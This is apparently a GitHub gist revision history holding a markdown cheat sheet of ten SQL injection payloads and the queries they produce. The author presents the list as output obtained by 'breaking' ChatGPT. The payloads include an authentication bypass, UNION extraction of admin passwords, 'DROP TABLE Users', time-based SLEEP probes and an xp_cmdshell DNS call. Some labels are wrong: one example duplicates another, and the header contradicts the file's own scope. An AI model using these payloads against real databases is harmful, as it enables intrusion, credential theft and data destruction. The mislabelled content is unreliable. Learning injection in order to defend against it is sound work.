shriyanss · January 21, 2025 16:28 · Nov 18, 2023 · Nov 18, 2023 · Nov 18, 2023
diff --git a/sql-select.md b/sql-select.md
@@ -1,4 +1,6 @@
 ## Must read
+This is for SQL INSERT statement. For INSERT statements, please see https://gist.github.com/shriyanss/1139f8c2b01e074642b7df745f9abc55
+
 ***I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-***
 
 I understand your request for examples of inputs that can lead to SQL injection vulnerabilities. Below are ten examples along with the potential malicious inputs and the resulting SQL queries. Please note that these examples are for educational purposes, and it's crucial to apply proper input validation and use parameterized queries or prepared statements to prevent SQL injection.

diff --git a/sql-select.md b/sql-select.md
@@ -0,0 +1,106 @@
+## Must read
+***I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-***
+
+I understand your request for examples of inputs that can lead to SQL injection vulnerabilities. Below are ten examples along with the potential malicious inputs and the resulting SQL queries. Please note that these examples are for educational purposes, and it's crucial to apply proper input validation and use parameterized queries or prepared statements to prevent SQL injection.
+
+### Example 1: Classic SQL Injection
+**Malicious Input:**
+```
+' OR '1'='1'; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' OR '1'='1'; --' AND Password = '';
+```
+
+### Example 2: Union-based SQL Injection
+**Malicious Input:**
+```
+' UNION SELECT null, 'Malicious Data', null; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' UNION SELECT null, 'Malicious Data', null; --' AND Password = '';
+```
+
+### Example 3: Error-based SQL Injection
+**Malicious Input:**
+```
+'; DROP TABLE Users; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = ''; DROP TABLE Users; --' AND Password = '';
+```
+
+### Example 4: Time-based Blind SQL Injection
+**Malicious Input:**
+```
+' OR IF(1=1, SLEEP(5), 0); --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' OR IF(1=1, SLEEP(5), 0); --' AND Password = '';
+```
+
+### Example 5: Boolean-based Blind SQL Injection
+**Malicious Input:**
+```
+' OR '1'='1' AND 'a'='a'; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' OR '1'='1' AND 'a'='a'; --' AND Password = '';
+```
+
+### Example 6: Out-of-Band SQL Injection
+**Malicious Input:**
+```
+'; EXEC xp_cmdshell('nslookup example.com'); --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = ''; EXEC xp_cmdshell('nslookup example.com'); --' AND Password = '';
+```
+
+### Example 7: UNION-Based SQL Injection (Extracting Data)
+**Malicious Input:**
+```
+' UNION SELECT username, password FROM admin_users; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' UNION SELECT username, password FROM admin_users; --' AND Password = '';
+```
+
+### Example 8: Tautology-Based SQL Injection
+**Malicious Input:**
+```
+' OR 1=1; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';
+```
+
+### Example 9: Numeric-Based SQL Injection
+**Malicious Input:**
+```
+' OR 1=1; --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';
+```
+
+### Example 10: Time Delay SQL Injection
+**Malicious Input:**
+```
+'; IF(1=1, SLEEP(5), 0); --
+```
+**Resultant Query:**
+```sql
+SELECT * FROM Users WHERE Username = ''; IF(1=1, SLEEP(5), 0); --' AND Password = '';
+```
+
+Preventing SQL injection involves using parameterized queries or prepared statements and validating/sanitizing user inputs. Always follow security best practices to protect your application from potential vulnerabilities.
No results found